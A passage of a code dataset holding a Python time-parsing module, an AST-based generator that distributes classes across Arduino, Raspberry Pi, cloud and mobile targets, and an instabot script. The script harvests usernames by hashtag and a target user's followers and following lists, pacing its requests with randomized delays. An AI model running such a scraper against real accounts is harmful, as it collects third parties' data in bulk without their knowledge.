('{0}')\".format(self.source))\n return wrapped\n\ndef operation_error(method):\n \"\"\"\n Catches AttributeErrors and TypeErrors and raises ApeErrors in their place so the operators can recover\n\n :param:\n\n - `method`: the method to decorate\n - `message`: for ApeError\n \"\"\"\n def wrapped(self, other):\n try:\n return method(self, other)\n except TypeError as error:\n self.log_error(error)\n raise ApeError(\"operand must be timedelta object, not '{0}\".format(other))\n return wrapped\n\ndef number_error(method):\n \"\"\"\n Catches AttributeErrors and TypeErrors and raises ApeErrors in their place so the operators can recover\n\n :param:\n\n - `method`: the method to decorate\n \"\"\"\n def wrapped(self, other):\n try:\n return method(self, other)\n except TypeError as error:\n self.log_error(error)\n raise ApeError(\"operand must be numeric object, not '{0}\".format(other))\n return wrapped\n\ndef unary_error(method):\n \"\"\"\n Catches AttributeErrors and TypeErrors and raises ApeErrors in their place so the operators can recover\n\n :param:\n\n - `method`: the method to decorate\n \"\"\"\n def wrapped(self):\n try:\n return method(self)\n except TypeError as error:\n self.log_error(error)\n raise ApeError(\"timedelta must be object, not '{0}\".format(self.timedelta))\n return wrapped\n\nclass RelativeTime(BaseClass):\n \"\"\"\n A timedeltas extension\n \"\"\"\n def __init__(self, source=None):\n \"\"\"\n RelativeTime constructor\n\n :param:\n\n - `source`: A string with relative time in it (e.g. '1week 2 days 4.2 seconds')\n \"\"\"\n super(RelativeTime, self).__init__()\n self.timedelta = None\n self._time_map = None\n self._source = None\n self.source = source \n return\n\n @property\n def source(self):\n \"\"\"\n :return: the source string\n \"\"\"\n return self._source\n\n @source.setter\n def source(self, source):\n \"\"\"\n sets the source and all the time values (if source is None, resets the values)\n \"\"\"\n self._source = source\n if source is not None: \n self.populate_fields()\n else:\n self.reset()\n return\n \n @property\n def time_map(self):\n \"\"\"\n A relative time map instance to parse the source.\n \"\"\"\n if self._time_map is None:\n self._time_map = RelativeTimeMap()\n return self._time_map\n\n @property\n @source_required\n def days(self):\n \"\"\"\n gets the timedelta days\n\n :return: number of days as an integer\n :raise: ApeError if the timedelta hasn't been built\n \"\"\"\n return self.timedelta.days\n \n @property\n @source_required\n def seconds(self):\n \"\"\"\n Gets the seconds from the time-delta\n\n :return: seconds (not total-seconds) as integer\n :raise: ApeError if the timedelta hasn't been built\n \"\"\"\n return self.timedelta.seconds\n\n @property\n @source_required\n def microseconds(self):\n \"\"\"\n Gets the microseconds from the timedelta\n\n :return: seconds (not total-seconds) as an integer\n :raise: ApeError if the timedelta not built not set\n \"\"\"\n return self.timedelta.microseconds\n\n @source_required\n def get_number(self, expression, group_name):\n \"\"\"\n gets the number from self.source that matches the expression\n\n :return: string with number or '0' if not found\n :raise: ApeError if self._source has not been set or group is missing\n :raise: IndexError if the group_name is not found (this is likely an implementation error, we want to crash)\n \"\"\"\n match = expression.search(self.source)\n if match is None:\n return '0'\n return match.group(group_name)\n \n def populate_fields(self):\n \"\"\"\n populates the time 
fields with values (e.g. self.minutes)\n\n \"\"\"\n years = self.get_number(self.time_map.year_expression, RelativeTimeMapGroups.years)\n months = self.get_number(self.time_map.month_expression, RelativeTimeMapGroups.months)\n weeks = self.get_number(self.time_map.week_expression, RelativeTimeMapGroups.weeks)\n days = self.get_number(self.time_map.day_expression, RelativeTimeMapGroups.days)\n hours = self.get_number(self.time_map.hour_expression, RelativeTimeMapGroups.hours)\n minutes = self.get_number(self.time_map.minute_expression, RelativeTimeMapGroups.minutes)\n seconds = self.get_number(self.time_map.second_expression, RelativeTimeMapGroups.seconds)\n\n now = datetime.now()\n\n # HACK\n # timedelta doesn't handle varying-units (e.g. 28 vs 30 vs 31 day in a month)\n # relativedelta does -- but it returns a datetime object, not a timedelta\n # so the adding and subtracting is to convert it to a timedelta\n self.timedelta = now + relativedelta(years=int(years),\n months=int(months),\n weeks=float(weeks),\n days=float(days),\n hours=float(hours),\n minutes=float(minutes),\n seconds=float(seconds)) - now\n \n return\n\n @source_required\n def total_seconds(self):\n \"\"\"\n gets the timedelta total_seconds\n\n :return: all the times summed to seconds (as a float)\n :raise: ApeError if the source has not been set\n \"\"\"\n return self.timedelta.total_seconds()\n\n def reset(self):\n \"\"\"\n Resets the attributes (undoes populate_fields)\n \"\"\"\n self.timedelta = None\n return\n\n # the operator overloading\n def __eq__(self, other):\n \"\"\"\n Checks if the timedelta is the same as the other.\n\n :param:\n\n - `other`: timedelta\n\n :return: True if self.timedelta is equal to other\n \"\"\"\n return self.timedelta == other\n\n def __lt__(self, other):\n \"\"\"\n Checks if the timedelta is less than the other\n \"\"\"\n return self.timedelta < other\n\n def __gt__(self, other):\n \"\"\"\n Checks if the timedelta is > other \n \"\"\"\n return self.timedelta > other\n \n def __le__(self, other):\n \"\"\"\n Checks if the timedelta is <= other\n \"\"\"\n return self.timedelta <= other\n\n def __ge__(self, other):\n \"\"\"\n Checks if the timedelta is >= other\n \"\"\"\n return self.timedelta >= other\n\n def __ne__(self, other):\n \"\"\"\n Checks to see if the timedelta isn't equal to the other\n\n :return: True if they aren't equal\n \"\"\"\n return self.timedelta != other\n \n def __cmp__(self, other):\n \"\"\"\n Compares timestamp with other timestamp\n\n :param:\n\n - `other`: a timedelta\n\n :return: -1 if less, 0 if equal, 1 if greater\n \"\"\"\n if self.timedelta == other:\n return 0\n if self.timedelta < other:\n return -1\n if self.timedelta > other:\n return 1\n return\n \n @operation_error\n def __add__(self, other):\n \"\"\"\n adds the timedelta to other\n\n :param:\n\n - `other`: a timedelta object\n\n :return: self.timedelta + other\n \"\"\"\n return self.timedelta + other\n\n @operation_error\n def __radd__(self, other):\n \"\"\"\n adds the timedelta to other\n\n :param:\n\n - `other`: a timedelta object\n\n :return: self.timedelta + other\n \"\"\"\n return self.timedelta + other\n\n @operation_error\n def __sub__(self, other):\n \"\"\"\n subtracts the other from the timedelta\n\n :param:\n\n - `other`: a timedelta object\n\n :return: self.timedelta - other\n \"\"\"\n return self.timedelta - other\n\n @operation_error\n def __rsub__(self, other):\n \"\"\"\n subtracts the timedelta from the other\n\n :param:\n\n - `other`: a timedelta object\n\n :return: other - 
self.timedelta\n        \"\"\"\n        return other - self.timedelta\n\n    @number_error\n    def __mul__(self, multiplier):\n        \"\"\"\n        multiplies the timedelta\n\n        :return: timedelta * multiplier \n        \"\"\"\n        return self.timedelta * multiplier\n\n    @number_error\n    def __rmul__(self, multiplier):\n        \"\"\"\n        multiplies the timedelta\n\n        :return: multiplier * timedelta \n        \"\"\"\n        return multiplier * self.timedelta\n\n    def __repr__(self):\n        \"\"\"\n        Pass-through to the timedelta\n        \"\"\"\n        return self.timedelta.__repr__()\n\n    @unary_error\n    def __neg__(self):\n        \"\"\"\n        Negates the timedelta\n\n        :return: -self.timedelta\n        \"\"\"\n        return -self.timedelta\n\n    @unary_error\n    def __pos__(self):\n        \"\"\"\n        Makes the timedelta positive\n\n        :return: +self.timedelta\n        \"\"\"\n        return +self.timedelta\n\n    @unary_error\n    def __abs__(self):\n        \"\"\"\n        Calls the absolute function on the timedelta\n\n        :return: abs(self.timedelta)\n        \"\"\"\n        return abs(self.timedelta)\n\n    @number_error\n    def __floordiv__(self, integer):\n        \"\"\"\n        Computes the floor and throws away the remainder\n\n        :return: self.timedelta // integer \n        \"\"\"\n        return self.timedelta // integer\n\n    def __str__(self):\n        \"\"\"\n        Returns the source string\n        \"\"\"\n        return self.source\n# end class RelativeTime\n\nclass AbsoluteTime(BaseClass):\n    \"\"\"\n    A container for the dateutil.parser.parse\n    \"\"\"\n    def __init__(self, default=None, ignoretz=False, tzinfos=None, dayfirst=False,\n                 yearfirst=False, fuzzy=True, parserinfo=None):\n        \"\"\"\n        AbsoluteTime constructor\n\n        :param:\n\n         - `default`: datetime object to use to supply missing fields\n         - `ignoretz`: if true, ignore timezone information in string\n         - `tzinfos`: dict or function that provides custom timezone information\n         - `dayfirst`: if true, ambiguous dates assume DD-MM-YY first\n         - `yearfirst`: if true, ambiguous dates assume YY-MM-DD\n         - `fuzzy`: if true, ignore unrecognizable tokens\n         - `parserinfo`: parserinfo class that changes the behavior of the parser\n        \"\"\"\n        super(AbsoluteTime, self).__init__()\n        self.default = default\n        self.ignoretz = ignoretz\n        self.tzinfos = tzinfos \n        self.dayfirst = dayfirst\n        self.yearfirst = yearfirst\n        self.fuzzy = fuzzy\n        self.parserinfo = parserinfo\n        return\n\n    def __call__(self, source):\n        \"\"\"\n        The main interface -- calls dateutil.parser.parse(source)\n\n        :param:\n\n         - `source`: string with time and date information to create datetime\n\n        :return: datetime object created from `source`\n        :raise: ApeError if the string is unrecognizable\n        \"\"\"\n        try:\n            return dateutil.parser.parse(source,\n                                         default=self.default,\n                                         ignoretz=self.ignoretz,\n                                         tzinfos=self.tzinfos,\n                                         dayfirst=self.dayfirst,\n                                         yearfirst=self.yearfirst,\n                                         fuzzy=self.fuzzy,\n                                         parserinfo=self.parserinfo)\n        except ValueError as error:\n            self.log_error(error)\n            raise ApeError(\"dateutil.parser.parse unable to parse '{0}'\".format(source))\n        return\n# end class AbsoluteTime\n\ntime_validator = Validator({'relative_time':RelativeTime,\n                            'absolute_time':AbsoluteTime()})\n\nif __name__ == '__main__':\n    import pudb; pudb.set_trace()\n    r = RelativeTime('3 seconds')\n    t = timedelta(seconds=3)\n    r.seconds\n    check = r != t","sub_path":"theape/infrastructure/timemap.py","file_name":"timemap.py","file_ext":"py","file_size_in_byte":18311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
+{"seq_id":"161415846","text":"from instabot import *\nimport os\nimport shutil\nimport time\nimport random\nfrom important 
import config\n\n\ndef delay(num):\n time.sleep(random.randint(5 * num, 10 * num))\n\n\ndef hashtag_username():\n hash = input(\"Enter hashtag = \")\n prev = []\n\n if not os.path.isdir(f'output/{hash}'):\n os.mkdir(f'output/{hash}')\n if not os.path.isfile(f'output/{hash}/username.csv'):\n prev = []\n with open(f'output/{hash}/username.csv', 'a') as file:\n file.write('')\n file.close()\n\n else:\n with open(f'output/{hash}/username.csv', 'r') as file:\n f = file.read()\n prev = f.split('\\n')\n file.close()\n for i in range(1000):\n start = time.time()\n users = insta.get_hashtag_users(str(hash))\n print(users)\n print(len(users))\n delay(2)\n new = list(set(users) - set(prev))\n print(new)\n print(len(new))\n prev = prev + list(new)\n with open(f'output/{hash}/username.csv', 'a') as outfile:\n outfile.write(\"\\n\".join(str(item) for item in new))\n end = time.time()\n print(\"total time taken : \", end - start)\n\n\ndef userfollowerfollowing():\n username = str(input(\"Enter target Username = \"))\n\n if not os.path.isdir(f'output/{username}'):\n os.mkdir(f'output/{username}')\n\n followings = insta.get_user_following(username)\n with open(f'output/{username}/following.csv', 'a') as file:\n for following in followings:\n print(following)\n file.write(str(following) + '\\n')\n file.close()\n\n delay(5)\n\n followers = insta.get_user_followers(username)\n with open(f'output/{username}/followers.csv', 'a') as file:\n for follower in followers:\n print(follower)\n file.write(str(follower) + '\\n')\n file.close()\n delay(4)\n\n\nif os.path.isdir('config'):\n shutil.rmtree('config')\n\ninsta = Bot()\n\ninsta.login(username=config.getUsername(), password=config.getPassword())\n\nwhile True:\n\n delay(3)\n print(\"___________MENU__________\\n \\n\"\n \" 1) Get Usernames From HashTag \\n\"\n \" 2) Get Followers and Following From Username\\n\")\n choose = int(input(\"Choose (1-2) = \"))\n start = time.time()\n\n if choose == 1:\n hashtag_username()\n elif choose == 2:\n userfollowerfollowing()\n else:\n print(\"Incorrect Selection\")\n break\n\n end = time.time()\n print(\"total time taken : \", end - start)\n\n\n\n\n\n\n\n\n","sub_path":"hashtag.py","file_name":"hashtag.py","file_ext":"py","file_size_in_byte":2500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"327874240","text":"import ast\nimport astunparse\nimport io\nimport sys\nimport os\n\ncommuTable = {\n 'Arduino' : {'Arduino':None, 'Raspberry':'Serial', 'Cloud':'http', 'Mobile':'Bluetooth'},\n 'Raspberry' : {'Arduino':'Serial', 'Raspberry':None, 'Cloud':'http', 'Mobile':'Socket'},\n 'Cloud' : {'Arduino':'http', 'Raspberry':'http', 'Cloud':None, 'Mobile':'http'},\n 'Mobile' : {'Arduino':'Bluetooth', 'Raspberry':'Socket', 'Cloud':'http', 'Mobile':None}\n }\n\ndebug = False\n\ndef codegen(node):\n astunparse.Unparser(node, sys.stdout)\n \nclass distFile(ast.NodeVisitor):\n def __init__(self, filePath):\n self.className = \"\"\n self.isDef = False\n self.filePath = filePath\n \n def generic_visit(self, node):\n if type(node).__name__ == 'ClassDef':\n self.isDef = True\n self.className = node.name\n else:\n self.isDef = False\n \n # 클래스 선언이 시작되면 클래스 별 저장\n if self.isDef == True:\n fileName = self.filePath\n if not os.path.exists(self.filePath):\n os.mkdir(self.filePath)\n fileName += \"/\" + self.className\n fileName += \".py\"\n f = open(fileName, 'w+t') \n sio = io.StringIO()\n astunparse.Unparser(node.body, sio)\n f.write(sio.getvalue())\n f.close()\n \n 
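        # Recurse into the children so that class definitions nested deeper in the tree are also split out into their own per-class files.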
ast.NodeVisitor.generic_visit(self, node)\n\nclass replaceAST(ast.NodeTransformer):\n importList = []\n \n def __init__(self):\n self.className = \"\"\n self.dispatchName = []\n\n def visit_FunctionDef(self, node):\n for callee in calleeArr:\n n = node.name\n \n if callee[0] == n and callee[1] == self.className:\n insertBody = CommLib.commRecvLib(self.className, callee[2], node)\n node.args.args.clear()\n break \n else:\n insertBody = []\n \n newNode = self.generic_visit(node)\n \n num = 0\n \n newBody = self.visit_body(newNode.body)\n \n for body in insertBody:\n newBody.insert(num, body)\n num = num + 1\n \n newNode.body = newBody\n \n return newNode\n \n def visit_ClassDef(self, node):\n self.className = node.name\n self.dispatch_flag = False\n newFunctionList = self.getDispatch()\n newNode = self.generic_visit(node)\n \n newBody = self.visit_body(node.body)\n needCommu = False\n \n for callee in calleeArr:\n if classArr.get(self.className) == 'Arduino' and (callee[1] == self.className or callee[2] == self.className):\n newBody.insert(0, ast.parse(\"_include = 'ArduinoJson.h'\"))\n needCommu = True\n break\n \n newNode.body = newBody\n num = 0\n \n for stmt in newNode.body:\n if type(stmt).__name__ == 'FunctionDef' and classArr.get(self.className) == 'Arduino' and needCommu:\n annAst = ast.AnnAssign(target = ast.Name(id = 'jsonBuffer', ctx = ast.Load()), annotation = ast.Name(id = 'DynamicJsonBuffer', ctx = ast.Load()), value = None, simple = 1)\n newNode.body.insert(num, annAst)\n# newNode.body.insert(num, ast.parse('_DynamicJsonBuffer_jsonBuffer'))\n# newNode.body.insert(num + 1, ast.Expr(value = ast.Name(id = '_JsonObject&_jsonObject', ctx = ast.Load())))\n needCommu = False\n break\n else:\n num = num + 1\n \n num = 0\n \n if classArr.get(self.className) == 'Arduino':\n loopFunction = self.getLoop()\n \n for stmt in newNode.body:\n if type(stmt).__name__ == 'FunctionDef' and stmt.name == 'setup': \n newNode.body.insert(num + 1, loopFunction)\n break\n else:\n num = num + 1\n \n num = 0\n \n for stmt in newNode.body:\n if type(stmt).__name__ == 'FunctionDef':\n if classArr.get(self.className) == 'Arduino':\n num = num + 1\n if stmt.name == 'loop':\n for newFunction in newFunctionList:\n newNode.body.insert(num, newFunction)\n num = num + 1\n break\n \n else:\n for newFunction in newFunctionList:\n newNode.body.insert(num, newFunction)\n num = num + 1\n break\n else:\n num = num + 1\n \n for impStmt in replaceAST.importList:\n newNode.body.insert(0, ast.Import(names = [ast.alias(name = impStmt, asname = None)]))\n\n replaceAST.importList = []\n newNode = ast.ClassDef(bases = node.bases, body = newNode, decorator_list = node.decorator_list, name = node.name)\n \n \n if self.dispatch_flag == True and classArr.get(self.className) != 'Arduino':\n if len(newFunctionList) > 1:\n num = 0\n for newFunction in newFunctionList:\n newNode.body.body.append(ast.parse(\"thread\"+ str(num) + \" = threading.Thread(target = \" + newFunction.name + \", args = ())\"))\n num = num + 1\n \n for n in range(0, num):\n newNode.body.body.append(ast.parse(\"thread\" + str(n) + \".start()\"))\n \n for n in range(0, num):\n newNode.body.body.append(ast.parse(\"thread\" + str(n) + \".join()\"))\n else:\n for newFunction in newFunctionList:\n newNode.body.body.append(ast.parse(newFunction.name + \"()\"))\n# dispatchValue = ast.Call(args = [], func = ast.Name(id='dispatch', ctx=ast.Load()), keywords = [])\n# dispatchCall = ast.Assign(targets = [ast.Name(id='_firstCall', ctx = ast.Store())], value = 
dispatchValue)\n#             newNode.body.body.append(dispatchCall)\n        \n        return newNode\n    \n    def visit_While(self, node):\n        newNode = self.generic_visit(node)\n        newBody = self.visit_body(newNode.body)\n        newNode.body = newBody\n        \n        return newNode\n    \n    def visit_If(self, node):\n        newNode = self.generic_visit(node)\n        \n        newBody = self.visit_body(newNode.body)\n        newNode.body.clear()\n\n        for stmt in newBody:\n            newNode.body.append(stmt)\n        \n        return newNode\n\n    def visit_For(self, node):\n        newNode = self.generic_visit(node)\n        \n        newBody = self.visit_body(newNode.body)\n        newNode.body = newBody\n        \n        return newNode\n\n    def visit_body(self, body):\n        newBody = []\n        for stmt in body:\n            if debug:\n                print (type(stmt))\n\n            if type(stmt).__name__ == 'Assign' or type(stmt).__name__ == 'Expr':\n\n                if type(stmt).__name__ == 'Assign':\n                    targets = stmt.targets\n                    \n                    if type(targets[0]).__name__ == 'Name' and targets[0].id == '_import_list':\n                        if type(stmt.value).__name__ == 'List' or type(stmt.value).__name__ == 'Tuple':\n                            for elem in stmt.value.elts:\n                                if type(elem).__name__ == 'Str' and elem.s not in replaceAST.importList:\n                                    replaceAST.importList.append(elem.s)\n                        elif type(stmt.value).__name__ == 'Str':\n                            if stmt.value.s not in replaceAST.importList:\n                                replaceAST.importList.append(stmt.value.s)\n                        continue\n                else:\n                    targets = []\n                \n                if type(stmt.value).__name__ == 'Call' and type(stmt.value.func).__name__ == 'Attribute' and type(stmt.value.func.value).__name__ == 'Name':\n                    clz = stmt.value.func.value.id\n                    meth = stmt.value.func.attr\n\n                    newStmts = CommLib.commSendLib(self.className, clz, targets, meth, stmt)\n                    \n                    for newStmt in newStmts:\n                        newBody.append(newStmt)\n                \n                else:\n                    newBody.append(stmt)\n\n            else:\n                newBody.append(stmt)\n\n        return newBody\n    \n    def getLoop(self):\n        loopFunction = ast.FunctionDef()\n        loopFunction.body = []\n        isExist = False\n        callFunction = [] # list of functions that must be called inside loop()\n        \n        if classArr.get(self.className) == 'Arduino':\n            for locProc in allLocProcList: # list of the functions defined at every location\n                if classArr.get(locProc[0]) == 'Arduino': \n                    if locProc[1] == 'setup':\n                        pass\n                    else:\n                        for callTup in calleeArr: # records which function is called, and from where\n                            if callTup[1] == self.className and callTup[0] == locProc[1]:\n                                # this function is handled by dispatch, so it does not need to be called from loop()\n                                isExist = True\n                                break\n                            elif callTup[1] == self.className:\n                                pass\n                            elif callTup[0] == locProc[1]:\n                                pass \n                            else:\n                                if locProc[1] in localFunc:\n                                    pass\n                                elif locProc[1] not in callFunction:\n                                    callFunction.append(locProc[1])\n        \n        if isExist == True:\n            for name in self.dispatchName:\n                loopFunction.body.append(ast.parse(name + \"()\"))\n        \n        if callFunction != []:\n            for expr in callFunction:\n                loopFunction.body.append(ast.parse(expr + '()'))\n        \n        if loopFunction.body == []:\n            return []\n        \n        loopFunction.args = []\n        loopFunction.decorator_list = []\n        loopFunction.name = 'loop'\n        loopFunction.returns = ast.NameConstant(value = None)\n        \n        return loopFunction\n    \n    \n    def getDispatch(self):\n        caller = \"\"\n        callee = \"\"\n        \n        commNodeList = []\n        commProtocolList = []\n        \n        currentCommFuncDict = {}\n        \n        newIfList = []\n        hasIfStmt = False\n        \n        for elem in calleeArr:\n            if elem[1] == self.className:\n                if currentCommFuncDict == {}:\n                    callee = elem[1]\n                    caller = elem[2]\n                    currentCommFuncDict[caller] = [elem[0]]\n                else:\n                    if elem[1] == callee and elem[2] == caller:\n                        currentCommFuncDict.get(caller).append(elem[0])\n                    else:\n                        caller = elem[2]\n                        if caller in currentCommFuncDict.keys():\n                            currentCommFuncDict.get(caller).append(elem[0])\n                        else:\n                            currentCommFuncDict[caller] = [elem[0]]\n        \n        
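        # Snapshot the caller keys: the merging pass below deletes entries from currentCommFuncDict, so it indexes this fixed list rather than the live keys() view.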
currentCommFuncKeys = list(currentCommFuncDict.keys())\n        \n        # group together classes that use the same communication method\n        for f_index in range(0, len(currentCommFuncDict.keys()) - 1):\n            f_commu = commuTable.get(classArr.get(currentCommFuncKeys[f_index])).get(classArr.get(self.className))\n            for s_index in range(f_index + 1, len(currentCommFuncDict.keys())):\n                s_commu = commuTable.get(classArr.get(currentCommFuncKeys[s_index])).get(classArr.get(self.className))\n                # when the current class, the first class, and the second class all use the same communication method\n                if f_commu == s_commu:\n                    if currentCommFuncKeys[s_index] not in currentCommFuncDict.get(currentCommFuncKeys[f_index]):\n                        sFuncList = currentCommFuncDict.get(currentCommFuncKeys[s_index])\n                        for func in sFuncList:\n                            currentCommFuncDict.get(currentCommFuncKeys[f_index]).append(func)\n                        del currentCommFuncDict[currentCommFuncKeys[s_index]]\n        \n        for currentCaller in currentCommFuncDict.keys():\n            funNum = -1\n            for locProcTup in allLocProcList:\n                if locProcTup[0] == self.className and locProcTup[1] in currentCommFuncDict.get(currentCaller):\n                    hasIfStmt = True\n                    funNum = locProcTup[2]\n                    ifSource = \"if funid == \" + str(funNum) + \":\\n\"\n                    ifSource += \"\\t\" + locProcTup[1] + \"()\\n\"\n                    newIfList.append(ast.parse(ifSource))\n            \n            commProtocol = commuTable.get(classArr.get(currentCaller)).get(classArr.get(self.className))\n            if commProtocol not in commProtocolList:\n                commNodeList.append(self.getCommuNode(self.className, currentCaller, newIfList))\n                commProtocolList.append(commProtocol)\n            \n            newIfList = []\n        \n        \n        if hasIfStmt == False:\n            return []\n        \n        n = 0\n        \n        newFunctionList = []\n        \n        for commNode in commNodeList:\n            newFunction = ast.FunctionDef()\n            newFunction.body = []\n            commProtocolIndex = commNodeList.index(commNode)\n            \n            for comm in commNode:\n                newFunction.body.insert(n, comm)\n                n = n + 1\n            \n            if classArr.get(self.className) == 'Arduino':\n                newFunction.name = 'dispatch_' + commProtocolList[commProtocolIndex]\n                newFunction.returns = ast.NameConstant(value = None)\n                self.dispatchName.append('dispatch_' + commProtocolList[commProtocolIndex])\n            else:\n                newFunction.name = 'dispatch_' + commProtocolList[commProtocolIndex]\n            \n            newFunction.args =[]\n            newFunction.decorator_list = []\n            self.dispatch_flag = True\n            \n            newFunctionList.append(newFunction)\n        \n        if len(newFunctionList) > 1:\n            if \"threading\" not in replaceAST.importList:\n                replaceAST.importList.append(\"threading\")\n        \n        return newFunctionList\n    \n    def getCommuNode(self, callee, caller, ifNode):\n        calleeClass = classArr.get(callee)\n        callerClass = classArr.get(caller)\n        comm = commuTable.get(callerClass).get(calleeClass)\n        \n        newCommu = []\n\n        if comm == 'Serial':\n            if calleeClass == 'Arduino':\n                newCommu.append(ast.parse('str: String = \"\"'))\n                bodySource = \"if Serial.available() > 0:\\n\" + \"\\tstr = Serial.readStringUntil(char('\\\\n'))\\n\"\n                newCommu.append(ast.parse(\"funid: int = 0\"))\n                newCommu.append(ast.parse(bodySource))\n                ifBodyAst = []\n                valueAst = ast.Call(args = [ast.Name(id = \"str\", ctx = ast.Load())], func = ast.Attribute(attr = \"parseObject\", ctx = ast.Load(), value = ast.Name(id = \"jsonBuffer\", ctx = ast.Load())), keywords = [], kwargs = None, starargs = None)\n                ifBodyAst.append(ast.AnnAssign(target = [ast.Name(id=\"jsonObject\", ctx = ast.Load())], annotation = ast.Name(id = \"JsonObject\", ctx = ast.Load()), value = valueAst, simple = 1))\n                ifBodyAst.append(ast.parse(\"funid = jsonObject['_funid']\"))\n                newCommu.append(ast.If(test = ast.Compare(comparators = [ast.Str(s = \"\")], left = ast.Name(id = \"str\", ctx = ast.Load()), ops 
= [ast.NotEq()]), body = ifBodyAst, orelse = []))\n newCommu.append(ifNode)\n newCommu.append(ast.parse('funid = -1'))\n \n return newCommu\n \n elif calleeClass == 'Raspberry':\n newCommu.append(ast.parse('global _ser, _jsonData'))\n newCommu.append(ast.parse('_ser = serial.Serial(\"/dev/ttyACM0\", 9600)'))\n whileBody = []\n whileBody.append(ast.parse('jsonStr = _ser.readline().strip().decode(\"utf-8\")'))\n whileBody.append(ast.parse('if jsonStr == \"\":\\n\\tcontinue'))\n whileBody.append(ast.parse('_jsonData = json.loads(jsonStr)'))\n whileBody.append(ast.parse('funid = _jsonData[\"_funid\"]'))\n whileBody.append(ifNode)\n whileBody.append(ast.parse('funid = -1'))\n whileNode = ast.While(test = ast.Name(id = 'True', ctx = ast.Load()), body = whileBody, orelse = [])\n newCommu.append(whileNode)\n \n return newCommu\n \n elif comm == 'Socket':\n if calleeClass == 'Raspberry':\n newCommu.append(ast.parse('global _conn'))\n newCommu.append(ast.parse('s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)'))\n newCommu.append(ast.parse('s.bind((HOST, PORT))'))\n newCommu.append(ast.parse('s.listen(1)'))\n whileBody = []\n whileBody.append(ast.parse('_conn, addr = s.accept()'))\n whileBody.append(ast.parse('global _recieveJsonData'))\n whileBody.append(ast.parse('_recieveData = \"\"'))\n whileBody.append(ast.parse('_cnt = 0'))\n \n source = \"while True:\\n\"\n source += \"\\ttmp = _conn.recv(1).decode('utf-8')\\n\" + \"\\t_recieveData += tmp\\n\"\n source += \"\\tif tmp == '{':\\n\" + \"\\t\\t_cnt = _cnt + 1\\n\" + \"\\telif tmp == '}':\\n\" + \"\\t\\t_cnt = _cnt - 1\\n\"\n source += \"\\tif _cnt == 0:\\n\" + \"\\t\\tbreak\\n\"\n whileBody.append(ast.parse(source))\n \n whileBody.append(ast.parse('if _recieveData == \"\":\\n\\tcontinue\\n'))\n whileBody.append(ast.parse('_recieveJsonData = json.loads(_recieveData)'))\n whileBody.append(ast.parse('funid = _recieveJsonData[\"_funid\"]'))\n whileBody.append(ifNode)\n whileBody.append(ast.parse('funid = -1'))\n whileNode = ast.While(test = ast.Name(id='True', ctx = ast.Load()), body = whileBody, orelse = [])\n newCommu.append(whileNode)\n \n return newCommu\n \n elif calleeClass == 'Mobile':\n newCommu.append(ast.parse('global _conn'))\n newCommu.append(ast.parse('s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)'))\n newCommu.append(ast.parse('s.bind((HOST, PORT))'))\n newCommu.append(ast.parse('s.listen(1)'))\n \n whileBody = []\n whileBody.append(ast.parse('_conn, addr = s.accept()'))\n \n source = \"while True:\\n\"\n source += \"\\ttmp = _conn.recv(1).decode('utf-8')\\n\" + \"\\t_recieveData += tmp\\n\"\n source += \"\\tif tmp == '{':\\n\" + \"\\t\\t_cnt = _cnt + 1\\n\" + \"\\telif tmp == '}':\\n\" + \"\\t\\t_cnt = _cnt - 1\\n\"\n source += \"\\tif _cnt == 0:\\n\" + \"\\t\\tbreak\\n\"\n whileBody.append(ast.parse(source))\n whileBody.append(ifNode)\n whileBody.append(ast.parse('funid = -1'))\n \n whileNode = ast.While(test = ast.Name(id = 'True', ctx = ast.Load()), body = whileBody, orelse = [])\n newCommu.append(whileNode)\n \n return newCommu\n \n elif comm == 'http': \n if calleeClass == 'Cloud':\n newCommu.append(ast.parse('funid = int(sys.argv[1])'))\n newCommu.append(ifNode)\n \n return newCommu\n \n elif calleeClass == 'Mobile':\n newCommu.append(ifNode)\n return newCommu\n \n elif comm == 'Bluetooth':\n newCommu.append(ifNode)\n return newCommu\n else:\n print (\"Not Supported Communication way\")\n \n return newCommu\n \nclass CommLib(): \n def commSendLib(fromClz, toClz, targets, meth, node):\n try:\n locToClz = 
classArr[toClz]\n locFromClz = classArr[fromClz]\n except:\n return [node]\n \n methval = ast.Num(n = -1)\n \n for remoteTup in allLocProcList:\n if remoteTup[0] == toClz and remoteTup[1] == meth:\n methval = ast.Num(n = remoteTup[2])\n break\n\n if locFromClz == 'Arduino' and locToClz == 'Raspberry':\n newNodes = CommLib.sendBySerialAtArduino(node, methval)\n \n if locFromClz == 'Raspberry' and locToClz == 'Arduino':\n newNodes = CommLib.sendBySerialAtRaspberry(node, methval)\n \n if locFromClz == 'Raspberry' and locToClz == 'Cloud':\n newNodes = CommLib.sendByHttpAtRaspberry(node, methval, targets)\n \n if locFromClz == 'Raspberry' and locToClz == 'Mobile':\n newNodes = CommLib.sendBySocketAtRaspberry(node, methval, targets)\n \n if locFromClz == 'Mobile' and locToClz == 'Cloud':\n newNodes = CommLib.sendByHttpAtMobile(node, methval, targets)\n \n if locFromClz == 'Mobile' and locToClz == 'Raspberry':\n newNodes = CommLib.sendBySocketAtMobile(node, methval)\n \n# else:\n# print (\"Invalid location\")\n# return [node]\n \n return newNodes\n \n def commRecvLib(toClz, fromClz, node):\n try:\n locToClz = classArr[toClz]\n locFromClz = classArr[fromClz]\n \n except:\n# print (\"commRecvLib : Exception\")\n return []\n \n returnNewArgs = []\n \n if locFromClz == 'Arduino' and locToClz == 'Raspberry':\n newArgs = CommLib.recieveBySerialAtRaspberry(node)\n \n for stmt in newArgs:\n returnNewArgs.append(stmt)\n \n if locFromClz == 'Raspberry' and locToClz == 'Arduino':\n newArgs = CommLib.recieveBySerialAtArduino(node)\n \n for stmt in newArgs:\n returnNewArgs.append(stmt)\n \n if locFromClz == 'Raspberry' and locToClz == 'Cloud':\n newArgs = CommLib.recieveByHttpAtCloud(node)\n \n for stmt in newArgs:\n returnNewArgs.append(stmt)\n \n if locFromClz == 'Raspberry' and locToClz == 'Mobile':\n newArgs = CommLib.recieveBySocketAtMobile(node)\n \n for stmt in newArgs:\n returnNewArgs.append(stmt)\n \n if locFromClz == 'Mobile' and locToClz == 'Cloud':\n newArgs = CommLib.recieveByHttpAtCloud(node)\n \n for stmt in newArgs:\n returnNewArgs.append(stmt)\n if locFromClz == 'Mobile' and locToClz == 'Raspberry':\n newArgs = 